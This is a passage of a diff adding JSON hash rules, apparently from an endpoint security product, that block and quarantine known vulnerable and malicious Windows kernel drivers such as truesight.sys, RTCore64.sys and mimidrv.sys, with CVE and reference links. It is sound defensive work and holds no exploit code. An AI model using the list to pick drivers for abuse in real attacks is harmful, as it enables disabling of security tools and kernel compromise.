+ "last_update": "2026-03-23T11:45:31.154674Z",
+ "creation_date": "2026-03-23T11:45:31.154676Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154681Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b5663df0ac14cf5dd905000d4b233c397136f3123ecea3797ee0f05c5673b2fe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f29f0779-9865-5616-b0b6-f323e5cefa88",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487344Z",
+ "creation_date": "2026-03-23T11:45:31.487346Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487351Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d7d52ae8481bf2ee43c8cf9f017587ee836f2834283c36e356142801175b5e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2ad3aec-d12e-5843-bd17-24482464ade9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141504Z",
+ "creation_date": "2026-03-23T11:45:31.141506Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141512Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "730660c0335ba73f2adcf2007ff6caea98d69bd9d90d321320b3b3e64eb3b296",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2bdbd17-0b58-5117-834d-8ed53914d0a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984372Z",
+ "creation_date": "2026-03-23T11:45:29.984374Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984380Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a88733b88cdc3f3cc040912ce5a3c44fa26f2ea8454cf6fc855b104a4910fa31",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2c8ec4c-638c-5b79-8f03-2c6954d9497b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.161129Z",
+ "creation_date": "2026-03-23T11:45:31.161131Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.161136Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9844610c40f241d1a856c4d81ba41904ae465cbf5bfa222a96c665274f0e42d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2e2c15e-cbbe-5255-9192-0507cb7e3d29",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825079Z",
+ "creation_date": "2026-03-23T11:45:31.825082Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825091Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fcd0c16be348a880d27b7210383009cf79620916321a368e809277ca03680c01",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2f5affc-2719-5dec-9af8-f26c09dbe8a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607578Z",
+ "creation_date": "2026-03-23T11:45:29.607580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be",
+ "comment": "Vulnerable Kernel Driver (aka Bs_Def.sys) [https://www.loldrivers.io/drivers/3ac0eda2-a844-4a9d-9cfa-c25a9e05d678/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2f665e3-f898-559a-a7d3-ed74160376f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819515Z",
+ "creation_date": "2026-03-23T11:45:30.819517Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819523Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0fc0644085f956706ea892563309ba72f0986b7a3d4aa9ae81c1fa1c35e3e2d3",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2f6b286-6cd5-55f7-b8b5-d18062d1b7c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617396Z",
+ "creation_date": "2026-03-23T11:45:29.617398Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617403Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c6c5e35accc37c928d721c800476ccf4c4b5b06a1b0906dc5ff4df71ff50943",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2ff97ad-ca65-59cf-9cad-89c044035620",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460708Z",
+ "creation_date": "2026-03-23T11:45:30.460711Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460720Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0dd3d43ab891777b11d4fdcb3b7f246b80bc66d12f7810cf268a5f6f4f8eb7b",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3023f78-c3d7-54b7-8000-bc4f9c0a1d0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615731Z",
+ "creation_date": "2026-03-23T11:45:29.615733Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615738Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61a3bf24d4e3eac56c380b022dfc195bad4cc8d03156cdc3ba743faab582284a",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f305977c-4376-5019-ac07-3acbffb88bd1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465311Z",
+ "creation_date": "2026-03-23T11:45:30.465314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465323Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69866557566c59772f203c11f5fba30271448e231b65806a66e48f41e3804d7f",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f30b5eb3-adad-5714-8676-93378ff9aacb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604167Z",
+ "creation_date": "2026-03-23T11:45:29.604170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604175Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b5603b60137fed0dfcc95ec10563b0d5fa2e033944019ba5f338f7f7bd2aa45b",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f31d0834-3c43-53a2-abec-226f20be9117",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146203Z",
+ "creation_date": "2026-03-23T11:45:32.146206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146214Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a82a5b833cf03738f2d159e2912d2947f5216a4d2adf31a204f365d7ceab430",
+ "comment": "Malicious Kernel Driver (aka 2.sys) [https://www.loldrivers.io/drivers/bb1f80f3-d2fd-463e-9403-57c919bd976b/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f31d757d-9f37-5499-a216-54ca752268f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153666Z",
+ "creation_date": "2026-03-23T11:45:31.153668Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153673Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "985e930812e841b4eb96dbf53451932109a90b875c7be4631c92383fce269447",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f330b0d6-e2f8-573a-8f06-15fab66995fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491679Z",
+ "creation_date": "2026-03-23T11:45:31.491682Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e688dcd34052f0b04222d1c0d024225f842e5d2529bc2876f4be51b49fd0f06",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3311e5e-43be-5b8d-957b-96050f09505a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613030Z",
+ "creation_date": "2026-03-23T11:45:29.613032Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613037Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d",
+ "comment": "Hilscher cifX Device Driver abuse (aka Physmem.sys) [https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f33acf16-b08c-5137-b09f-e54ce6e3d779",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610741Z",
+ "creation_date": "2026-03-23T11:45:29.610743Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610748Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bac709c49ddee363c8e59e515f2f632324a0359e932b7d8cb1ce2d52a95981aa",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3455a32-c6f4-5d0d-9d8f-ab192a9db134",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983421Z",
+ "creation_date": "2026-03-23T11:45:29.983423Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "630d7bdc20f33e6f822f52533a324865694886b7b74dfaad1dc30c9aee4260a2",
+ "comment": "Vulnerable Kernel Driver (aka My.sys) [https://www.loldrivers.io/drivers/b7ec29c6-e151-4a9f-a293-e61f04ee6489/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3503be4-8609-5925-a9bd-ed45559c8262",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972543Z",
+ "creation_date": "2026-03-23T11:45:29.972545Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972550Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a6212f3b68a6f263e96420b3607b31cfdfe51afff516f3c87d27bf8a89721e8",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f35ae36a-1300-55f7-977d-5dca164c6cce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611235Z",
+ "creation_date": "2026-03-23T11:45:29.611237Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611243Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1c71a98e10105faa0814fec3544474d86ae0e8f88efd77798a716adad3994a2",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f35b8166-c1b7-5d95-825d-7ed52ea9ba84",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829414Z",
+ "creation_date": "2026-03-23T11:45:31.829417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829423Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a90c426d7fd9e5f88f28af8dae29291b0e00f540ed4c9fcf87c4dc221a181d74",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f36c0339-2c88-5122-853f-972b8e1f0ee4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144581Z",
+ "creation_date": "2026-03-23T11:45:31.144583Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144588Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
